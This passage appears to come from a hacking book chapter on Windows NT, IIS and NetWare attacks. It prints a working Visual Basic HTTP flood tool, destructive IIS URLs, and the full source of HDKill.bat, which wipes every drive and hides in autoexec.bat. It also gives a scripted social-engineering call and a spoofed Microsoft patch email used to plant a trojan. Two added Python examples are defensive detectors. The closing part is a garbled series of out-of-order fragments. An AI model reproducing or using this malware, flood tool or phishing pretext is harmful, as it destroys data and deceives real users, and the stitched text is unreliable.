Figure 10.9 DoS implications of the telnet hack attack.

Figure 10.10 Dr. Watson to the rescue.

At this point, IIS could immediately crash, or crash upon scheduled administrative service interruptions—essentially, upon administrative shutdown and/or service restart. The destructive requests include the following URLs:

• www.victim.com/Scripts/Tools/Newdsn.exe?Createdatabase
• www.victim.com/Scripts/Tools/Newdsn.exe?Create

Severe Congestion

Synopsis: Custom HTTP request saturation can cause severe resource degradation.

Hack State: CPU congestion.

Vulnerabilities: Win NT 3x, 4, and Internet Information Server version 3, 4, 5.

Breach: Using a simple underground IIS attack software module (see Figure 10.11) that has been programmed for an unlimited hit count, a remote attacker can cause severe CPU congestion, resulting in resource degradation and, ultimately, potential service denial. The program shown here was written in Visual Basic and includes only a single form (see Figure 10.12).

Figure 10.11 IIS attack via custom HTTP request saturation.

Figure 10.12 VB form for Main.frm.

main.frm

    Private Stopper&

    Private Sub Command1_Click()
        On Error GoTo ErrorHandler
        If Command1.Caption = "begin" Then
            If IsNumeric(Text2.Text) = False Then MsgBox "Please enter a valid amount!", vbExclamation, "": Text2.Text = "0": Exit Sub
            Command1.Caption = "stop"
            Text3.Visible = True
            For a = 1 To Text2.Text
                If Stopper& = 1 Then Exit Sub
                Do While Inet1.StillExecuting
                    DoEvents
                Loop
                Inet1.Execute Text1.Text, "GET " & Text1.Text
                Text3.Text = Text3.Text + 1
            Next a
        Else
            Stopper& = 1
            Command1.Caption = "begin"
            Text3.Visible = False
        End If
        Exit Sub
    ErrorHandler:
        MsgBox "Please enter a valid web server!", vbInformation, ""
        Exit Sub
    End Sub

System Control

The purpose of this section is to re-create a common system control attack on Win NT servers. Attacks like this one against IT staff happen almost every day.
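Returning to the Severe Congestion breach above: the tool's only signature is one client replaying the same GET in a tight loop, which is easy to pick out of the server's own logs. The following Python is an added example written for this edition, not code from the book; it parses constructed IIS W3C extended log lines (the field names come from the `#Fields:` header) and flags any client/URI pair whose request rate no browser would produce.

```python
"""Detect single-source HTTP request saturation in IIS W3C extended logs.

Added example, not from the book: the Severe Congestion breach is one client
replaying the same GET in a loop, which in the log shows up as one c-ip hitting
one cs-uri-stem far faster than a browser. Sample lines are constructed."""

from collections import defaultdict
from datetime import datetime

def build_sample_log():
    """Constructed sample: one normal visitor and one host looping on GET."""
    lines = ["#Software: Microsoft Internet Information Server",
             "#Fields: date time c-ip cs-method cs-uri-stem sc-status"]
    for sec in (0, 25, 50):                  # a browser: three hits in a minute
        lines.append(f"2000-10-10 18:09:{sec:02d} 10.0.0.5 GET /default.asp 200")
    for i in range(30):                      # the flooder: 30 hits in 5 seconds
        lines.append(f"2000-10-10 18:09:{1 + i // 6:02d} 192.0.2.77 GET /default.asp 200")
    return "\n".join(lines) + "\n"

def parse_w3c(text):
    """Parse W3C extended log lines into dicts keyed by the #Fields header."""
    fields, entries = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):        # skip truncated or malformed lines
            continue
        entry = dict(zip(fields, parts))
        entry["ts"] = datetime.strptime(entry["date"] + " " + entry["time"], "%Y-%m-%d %H:%M:%S")
        entries.append(entry)
    return entries

def saturation_sources(entries, window_seconds=10, threshold=20):
    """{(c-ip, cs-uri-stem): peak hits} for pairs reaching threshold in any window."""
    by_key = defaultdict(list)
    for e in entries:
        if e["cs-method"] == "GET":
            by_key[(e["c-ip"], e["cs-uri-stem"])].append(e["ts"])
    flagged = {}
    for key, stamps in by_key.items():
        stamps.sort()
        peak, start = 0, 0
        for end, ts in enumerate(stamps):    # two-pointer sliding window
            while (ts - stamps[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[key] = peak
    return flagged
```

Tune `window_seconds` and `threshold` to the site's normal traffic; the sliding window keeps a burst that straddles a minute boundary from being split into two harmless halves.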
For simplicity, this hack is broken into a few effortless steps:

Step 1: The Search

In this step, the attacker chooses an IT staff victim. Whether the attacker already knows the victim or searches the victim’s company Web site, it takes very little effort to perform some social engineering to reveal a target email address. Remarkably, some sites actually post IT staff support email addresses, and more remarkably, individual names, addresses, and even photos. This sample social engineering technique was like taking candy from a baby:

• Hacker: “Good morning; my name is Joe Hacker from Microsoft. Please transfer me to your IT department. They are expecting my call as I am responding to a support call, ticket number 110158.”
• Reception: “Oh, okay. Do you have the name of the person you are trying to reach?”
• Hacker: “No, sorry… The caller didn’t leave a name… wait, let me check… (sound of hacker typing on the keyboard). Nope, only this contact number.”
• Reception: “I’ll transfer you to Tom; he’s in IT. He’ll know who to transfer you to.”
• Tom: “Hello?”
• Hacker: “Good morning, Tom; my name is Joe Hacker, from Microsoft support. I’m responding to a support call, ticket number 110158, and I’m making this call to put your staff on our automated NT security alert list.”
• Tom: “Whom were you trying to reach?”
• Hacker: “Our terminals are down this morning; all I have is this contact number. All I need is an IT staff email address to add to our automated NT security alert list. When new patches are available for any substantiated NT vulnerabilities, the recipient will receive updates. Currently, three new patches are available in queue. Also… ” (interrupted)
• Tom: “Cool; it’s a pain trying to keep up with these patches.”
• Hacker: “It says here your primary Web server is running IIS. Which version is it?”
• Tom: “Believe it or not, it’s 3.0. We’re completely swamped, so we’ve put this on the back burner. You can use my address for the advisories; it’s tom.fooled@victim.com.”
• Hacker: “Consider it done, ticket closed. Have a nice day.”

Step 2: The Alert

During this step, the attacker decides on the remote-control daemon and accompanying message. In this particular case, the attacker chose phAse Zero:

Port: 555, 9989
Service: Ini-Killer, NeTAdmin, phAse Zero, Stealth Spy
Hacker’s Strategy: Aside from spy features and file transfer, the most important purpose of these Trojans is to destroy the target system. The only saving grace is that these daemons can only infect a system upon execution of setup programs that need to be run on the host.

Using a mail-spoofing program, as mentioned earlier in this book, the attacker’s message arrived (spoofed from Microsoft):

>On 10 Oct 2000, at 18:09, support@microsoft.com wrote:
>
>Issue
>=====
>This vulnerability involves the HTTP GET method, which is used to obtain
>information from an IIS Web server. Specially malformed GET requests can
>create a denial-of-service situation that consumes all server resources,
>causing a server to “hang.” In some cases, the server can be put back into
>service by stopping and restarting IIS; in others, the server may need to
>be rebooted. This situation cannot happen accidentally. The malformed GET
>requests must be deliberately constructed and sent to the server. It is
>important to note that this vulnerability does not allow data on the
>server to be compromised, nor does it allow any privileges on it to be usurped.
>
>Affected Software Versions
>==========================
> - Microsoft Internet Information Server, version 3.0 and 4.0, on x86 and
>Alpha platforms.
>
>What Customers Should Do
>========================
>The attached patch for this vulnerability is fully supported and should be applied
>immediately, as all systems are determined to be at risk of attack. Microsoft recommends
>that customers evaluate the degree of risk that this vulnerability poses to their systems,
>based on physical accessibility, network, and Internet connectivity, and other factors.
>
>Obtaining Support on This Issue
>===============================
>This is a supported patch. If you have problems installing
>this patch, or require technical assistance with this patch,
>please contact Microsoft Technical Support. For information
>on contacting Microsoft Technical Support, please see
>http://support.microsoft.com/support/contact/default.asp.
>
>Revisions
>=========
> - October 10, 2000: Bulletin Created
>
>For additional security-related information about Microsoft products,
>please visit http://www.microsoft.com/security
>
>THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS-
>IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
>EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND
>FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
>SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
>INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
>EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
>POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
>LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
>FOREGOING LIMITATION MAY NOT APPLY.
>
>(c) 2000 Microsoft Corporation. All rights reserved. Terms of Use.
>
> *******************************************************************
>You have received this email bulletin as a result of your registration
>to the Microsoft Product Security Notification Service. You may
>unsubscribe from this email notification service at any time by sending
>an email to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
>The subject line and message body are not used in processing the request,
>and can be anything you like.
>
>For more information on the Microsoft Security Notification Service
>please visit http://www.microsoft.com/security/bulletin.htm. For
>security-related information about Microsoft products, please visit the
>Microsoft Security Advisor Web site at http://www.microsoft.com/security.

Step 3: Another Successful Victim

During this step, the attacker simply waits a few days before exercising complete remote control with the phAse Zero client, as shown in Figure 10.13.

Figure 10.13 Complete control with phAse Zero.

Miscellaneous Mayhem

Windows 3x, 9x, 2000

Hack State: Hard drive obliteration.

File: HDKill.bat.

Synopsis: Some hackers enjoy generating havoc among their victims. This nasty hard-drive killer, for example, has been attached to countless emails, and distributed with game evaluations as a ReadMe.bat file. In other cases, hackers go to the trouble of breaking into systems only to add this file to the system bootup process. Careful inspection of the code will reveal its purpose.
Hdkill.bat

    @echo off
    :start
    cls
    echo PLEASE WAIT WHILE PROGRAM LOADS…
    call attrib -r -h c:\autoexec.bat >nul
    echo @echo off >c:\autoexec.bat
    echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
    call attrib +r +h c:\autoexec.bat >nul
    set drive=
    set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
    echo @echo off >drivechk.bat
    echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul > {t}.bat
    %comspec% /e:2048 /c {t}.bat >>drivechk.bat
    del {t}.bat
    echo if errorlevel 1 goto enddc >>drivechk.bat
    cls
    echo PLEASE WAIT WHILE PROGRAM LOADS…
    echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find "bytes" > nul >{t}.bat
    %comspec% /e:2048 /c {t}.bat >>drivechk.bat
    del {t}.bat
    echo if errorlevel 1 goto enddc >>drivechk.bat
    cls
    echo PLEASE WAIT WHILE PROGRAM LOADS…
    echo @prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" > nul >{t}.bat
    %comspec% /e:2048 /c {t}.bat >>drivechk.bat
    del {t}.bat
    echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat
    cls
    echo PLEASE WAIT WHILE PROGRAM LOADS…
    echo :enddc >>drivechk.bat
    :testdrv
    for %%a in (%alldrive%) do call drivechk.bat %%a >nul
    del drivechk.bat >nul
    :form_del
    call attrib -r -h c:\autoexec.bat >nul
    echo @echo off >c:\autoexec.bat
    echo echo Loading Windows, please wait while Microsoft Windows recovers your system… >>c:\autoexec.bat
    echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest > nul >>c:\autoexec.bat
    echo cls >>c:\autoexec.bat
    echo echo Loading Windows, please wait while Microsoft Windows recovers your system… >>c:\autoexec.bat
    echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
    echo cls >>c:\autoexec.bat
    echo echo Loading Windows, please wait while Microsoft Windows recovers your system… >>c:\autoexec.bat
    echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
    echo cls >>c:\autoexec.bat
    echo echo Loading Windows, please wait while Microsoft Windows recovers your system… >>c:\autoexec.bat
    echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest > nul >>c:\autoexec.bat
    echo cls >>c:\autoexec.bat
    echo echo Loading Windows, please wait while Microsoft Windows recovers your system… >>c:\autoexec.bat
    echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
    echo cls >>c:\autoexec.bat
    echo echo Loading Windows, please wait while Microsoft Windows recovers your system… >>c:\autoexec.bat
    echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
    echo cd\ >>c:\autoexec.bat
    echo cls >>c:\autoexec.bat
    echo echo Welcome to the land of death. Munga Bunga's Multiple Hard Drive Killer version 4.0. >>c:\autoexec.bat
    echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following… >>c:\autoexec.bat
    echo echo 1. To make people aware that security should not be taken for granted. >>c:\autoexec.bat
    echo echo 2. Love is important, if you have it, truly, don't let go of it like I did! >>c:\autoexec.bat
    echo echo 3. If you are NOT a vegetarian, then you are a murderer, and I'm glad your HD is dead. >>c:\autoexec.bat
    echo echo 4. If you are Australian, I feel sorry for you, accept my sympathy, you retard. >>c:\autoexec.bat
    echo echo 5. Don't support the following: War, Racism, Drugs and the Liberal Party.>>c:\autoexec.bat
    echo echo. >>c:\autoexec.bat
    echo echo Regards, >>c:\autoexec.bat
    echo echo. >>c:\autoexec.bat
    echo echo Munga Bunga >>c:\autoexec.bat
    call attrib +r +h c:\autoexec.bat
    :makedir
    if exist c:\temp.bat attrib -r -h c:\temp.bat >nul
    echo @echo off >c:\temp.bat
    echo %%1:\ >>c:\temp.bat
    echo cd\ >>c:\temp.bat
    echo :startmd >>c:\temp.bat
    echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul cd %%2") do %%%%a >>c:\temp.bat
    echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$$hole !!!! >>c:\temp.bat
    echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul goto startmd >>c:\temp.bat
    call attrib +r +h c:\temp.bat >nul
    cls
    echo Initializing Variables…
    for %%a in (%drive%) do call format %%a: /q /u /autotest >nul
    cls
    echo Initializing Variables…
    echo Validating Data…
    for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
    cls
    echo Initializing Variables…
    echo Validating Data…
    echo Analyzing System Structure…
    for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul
    call attrib +r +h c:\temp.bat >nul
    call attrib +r +h c:\autoexec.bat >nul
    cls
    echo Initializing Variables…
    echo Validating Data…
    echo Analyzing System Structure…
    echo Initializing Application…
    for %%a in (%drive%) call deltree /y %%a:\*. >nul
    cls
    echo Initializing Variables…
    echo Validating Data…
    echo Analyzing System Structure…
    echo Initializing Application…
    echo Starting Application…
    for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
    cls
    echo Thank you for using a Munga Bunga product.
    echo.
    echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius.
    echo.
    echo Here is a joke for you…

[...]

... program is almost too simple to use: the only requirement is that the attacker have Read access to the target file.

Figure 10.18 Locking files with Bastard

Miscellaneous Mayhem

Disappearing Disk Usage

Synopsis: Hackers can crash hard drives by filling up all available space.

Hack State: System crash.

Vulnerabilities: NetWare 2/3.

Breach: Burn.c by the infamous hacker, Jitsu-Disk depletes available...
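The HDKill.bat listing above is worth inspecting for what it does rather than what it prints: it rewrites c:\autoexec.bat so the damage runs at the next boot, hides that file with attrib +h, and loops format /u and deltree /y over every drive it could enumerate. The Python below is an added example (not code from the book) showing how a static triage pass can surface exactly that without executing the file: it unwraps the `echo ... >>c:\autoexec.bat` indirection and flags startup-file writes, destructive verbs and attribute hiding. The sample batch text is constructed for the example, a few lines in the spirit of the listing.

```python
"""Static triage of a DOS/Windows batch file for boot-time destructive payloads.

Added example, not from the book. Three behaviours in HDKill.bat are visible
without running it: commands planted into a startup file via `echo ... >>`,
destructive verbs (format, deltree, del, rd), and `attrib +h` used to hide the
planted file. SAMPLE_BAT below is constructed for this example."""

import re

DESTRUCTIVE = re.compile(r"(?i)\b(format|deltree|del|rd|rmdir)\b")
STARTUP_FILES = re.compile(r"(?i)autoexec\.bat|config\.sys|win\.ini")
HIDE_ATTRIB = re.compile(r"(?i)\battrib\b.*\+h")

def unwrap_echo(line):
    """If `line` is `echo <text> >file` or `>>file`, return (text, file) with
    batch's doubled percent signs collapsed (%%a -> %a); else (None, None)."""
    m = re.match(r"\s*echo\s+(.*?)\s*>>?\s*(\S+)\s*$", line, re.IGNORECASE)
    if not m:
        return None, None
    return m.group(1).replace("%%", "%"), m.group(2)

def triage(batch_text):
    """Return [(line_no, category, detail)] for suspicious lines in a listing.

    Categories: 'startup-write' (a command planted into a startup file),
    'destructive' (format/deltree/del/rd, also inside planted commands),
    'hide' (attrib +h on any file)."""
    findings = []
    for no, line in enumerate(batch_text.splitlines(), 1):
        body, target = unwrap_echo(line)
        if target and STARTUP_FILES.search(target):
            findings.append((no, "startup-write", body))
            line = body                      # inspect the planted command too
        if DESTRUCTIVE.search(line):
            findings.append((no, "destructive", line.strip()))
        if HIDE_ATTRIB.search(line):
            findings.append((no, "hide", line.strip()))
    return findings

# Constructed sample in the style of the listing (not the full file).
SAMPLE_BAT = r"""@echo off
cls
echo PLEASE WAIT WHILE PROGRAM LOADS...
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
echo echo Loading Windows, please wait... >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat >nul
for %%a in (%drive%) call deltree /y %%a:\ >nul
"""
```

Run `triage(SAMPLE_BAT)` to see the three categories fire on lines 5 through 9; the "Loading Windows" decoy text is reported only as a startup write, since the scanner looks at verbs, not at what the file says it is doing.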
... NETCRACK

Common user accounts in NetWare and affiliated hardware partners include: PRINT, WANGTEK, LASER, FAX, HPLASER, FAXUSER, PRINTER, FAXWORKS, LASERWRITER, TEST, POST, ARCHIVIST, MAIL, CHEY_ARCHSVR, GATEWAY, WINDOWS_PASSTHRU, GATE, ROOT, ROUTER, WINSABRE, BACKUP, SUPERVISOR

Figure 10.17 Hacking with NetCrack

System Control

Backdoor Installation

Synopsis: After gaining administrative access, hackers follow a...

... the backdoor and to enable its login to show up in the normal tools that show active connections.

Locking Files

Synopsis: Inside and local hackers can wreak havoc by modifying file usability.

Hack State: File control.

Vulnerabilities: NetWare 2x, 3x, 4x, IntraNetWare 4x.

Breach: After gaining access to NetWare, some hackers are keen on causing chaos by locking files. This hack attack, associated with a program...

... this point, and on the same address scheme as the administrator and/or target server, the hacker loads an IPX packet sniffer and waits to capture the system password. Among hackers, a popular sniffer package is SpyNet (Chapter 8 describes this package more fully). If the attacker wants to conceal evidence of the hack, he or she erases the system log from //etc/console.log by unloading and reloading the...

... concludes with a compilation of Underground Novell NetWare hack attacks. This section was prepared with help from the Nomad Mobile Research Centre (NMRC), in particular: Simple Nomad and contributors: Shadowlord, Mindgame, The LAN God, Teiwaz, Fauzan Mirza, David Wagner, Diceman, Craigt, Einar Blaberg, Cyberius, Jungman, RX2, itsme, and Greg Miller.

Accounts

• Distinguishing valid account names on...
... environments, unpassworded admin and guest accounts have been unveiled. It is possible, however, that the system administrator has renamed the administrator account. Hackers know that typing “NBTSTAT -A ipaddress” reveals the new administrator account.

Passwords

• Accessing the password file. The NT security database is located in \\WINNT\SYSTEM32\CONFIG\SAM. By default, the SAM is readable, but...

Figure 10.16 Hacking with NTAdmin

Common Accounts

Two accounts typically come with NT: administrator and guest. In numerous...

... database. This process can be painless, by using hacker/programmer Jeremy Allison’s PWDUMP, coupled with a password-cracking program as defined earlier in this chapter.

From the Console

• Information gathering. From the console on a domain controller, hackers use the following simple steps to get a list of accounts on the target machine. With a list of user accounts, they can target individual attacks: ...

... is a common Underground password cracker for NT. Operating remotely or locally, an attacker can port custom dictionaries on behalf of the attempted login username and/or password. What’s unique with this particular tool is the speed at which simulated logons can be attempted (see Figure 10.15).

Hack State: Administrative privileges exploitation.

File: NTAdmin.exe.

Synopsis: Local attackers exploit vulnerable...

... log_error ("parse_header: malloc failed"); return -1; } *header = h; h->name = NULL; h->value = NULL; n = read_until (fd, ':', &data); if (n name = data; len = n; n = read_until (fd, '\r', &data); if (n ...